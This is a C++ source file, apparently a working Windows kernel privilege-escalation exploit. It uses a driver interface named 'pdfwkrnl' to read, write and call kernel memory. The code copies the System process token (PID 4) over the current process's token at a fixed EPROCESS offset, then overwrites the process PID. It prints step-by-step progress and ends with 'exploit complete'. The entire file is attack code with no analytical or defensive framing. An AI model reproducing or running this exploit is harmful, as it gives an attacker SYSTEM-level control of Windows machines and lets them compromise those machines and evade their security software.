#include "PdFwKrnl.h"

typedef struct _EX_FAST_REF {
	union {
		VOID* Object;        
		ULONGLONG RefCnt : 4;
		ULONGLONG Value;     
	};
}EX_FAST_REF, *PEX_FAST_REF;

int main(void) {
	if (!pdfwkrnl::attach()) {
		printf(STR("failed to attach to driver \n"));
		return -1;
	}

	PVOID* ntoskrnl_object = nullptr;
	PVOID* current_process_object = nullptr;
	uint64_t current_process_pid = GetCurrentProcessId();
	uint64_t ntoskrnl_pid = 4;
	EX_FAST_REF ntoskrnl_token{};
	EX_FAST_REF current_process_token{};

	printf(STR("starting exploit \n"));

	printf(STR("getting ntoskrnl object \n"));

	pdfwkrnl::call_kernel_function<NTSTATUS>(pdfwkrnl::get_kernel_export("PsLookupProcessByProcessId"), (HANDLE)4, &ntoskrnl_object);
	if (!ntoskrnl_object) {
		printf(STR("failed to obtain ntoskrnl object \n"));
		return pdfwkrnl::detach();
	}

	printf(STR("obtained ntoskrnl object @ %p \n"), ntoskrnl_object);

	printf(STR("getting ntoskrnl token \n"));

	ntoskrnl_token = pdfwkrnl::read<EX_FAST_REF>((uint64_t)ntoskrnl_object + 0x4b8);
	if (!ntoskrnl_token.Object) {
		printf(STR("failed to obtain ntoskrnl token \n"));
		return pdfwkrnl::detach();
	}

	printf(STR("obtained ntoskrnl token | object @ %p \n"), ntoskrnl_token.Object);

	printf(STR("current process pid %d \n"), current_process_pid);
	printf(STR("ntoskrnl pid %d \n"), 4);

	printf(STR("getting current process object \n"));

	pdfwkrnl::call_kernel_function<NTSTATUS>(pdfwkrnl::get_kernel_export("PsLookupProcessByProcessId"), (HANDLE)current_process_pid, &current_process_object);
	if (!current_process_object) {
		printf(STR("failed to obtain current process object \n"));
		return pdfwkrnl::detach();
	}

	printf(STR("obtained current process object @ %p \n"), current_process_object);

	printf(STR("getting current process token \n"));

	current_process_token = pdfwkrnl::read<EX_FAST_REF>((uint64_t)current_process_object + 0x4b8);
	if (!current_process_token.Object) {
		printf(STR("failed getting current process token \n"));
		return pdfwkrnl::detach();
	}

	printf(STR("overwriting current process token with ntoskrnl's token \n"));

	if (!pdfwkrnl::write((uint64_t)current_process_object + 0x4b8, &ntoskrnl_token, sizeof(EX_FAST_REF))) {
		printf(STR("failed overwriting current process token \n"));
		return pdfwkrnl::detach();
	}

	printf(STR("checking if overwrite was success \n"));

	EX_FAST_REF current_process_token_temp = pdfwkrnl::read<EX_FAST_REF>((uint64_t)current_process_object + 0x4b8);
	if (current_process_token_temp.Object != ntoskrnl_token.Object) {
		printf(STR("failed overwriting current process token \n"));
		return pdfwkrnl::detach();
	}

	printf(STR("token was successfully overwriten \n"));

	printf(STR("overwriting current process's pid to ntoskrnl's \n"));

	if (!pdfwkrnl::write((uint64_t)current_process_object + 0x440, &ntoskrnl_pid, sizeof(uint64_t))) {
		printf(STR("failed overwriting current process pid to ntoskrnl's \n"));
		return pdfwkrnl::detach();
	}

	printf(STR("checking if current process's pid was overwriten \n"));

	if (pdfwkrnl::read<uint64_t>((uint64_t)current_process_object + 0x440) != ntoskrnl_pid) {
		printf(STR("failed overwriting current process pid to ntoskrnl's \n"));
		return pdfwkrnl::detach();
	}

	printf(STR("pid was successfully overwriten \n"));

	printf(STR("hello to two ntoskrnl's lol \n"));

	printf(STR("exploit complete bye (: \n"));

	printf(STR("enter to exit \n"));

	getchar();

	return pdfwkrnl::detach();
}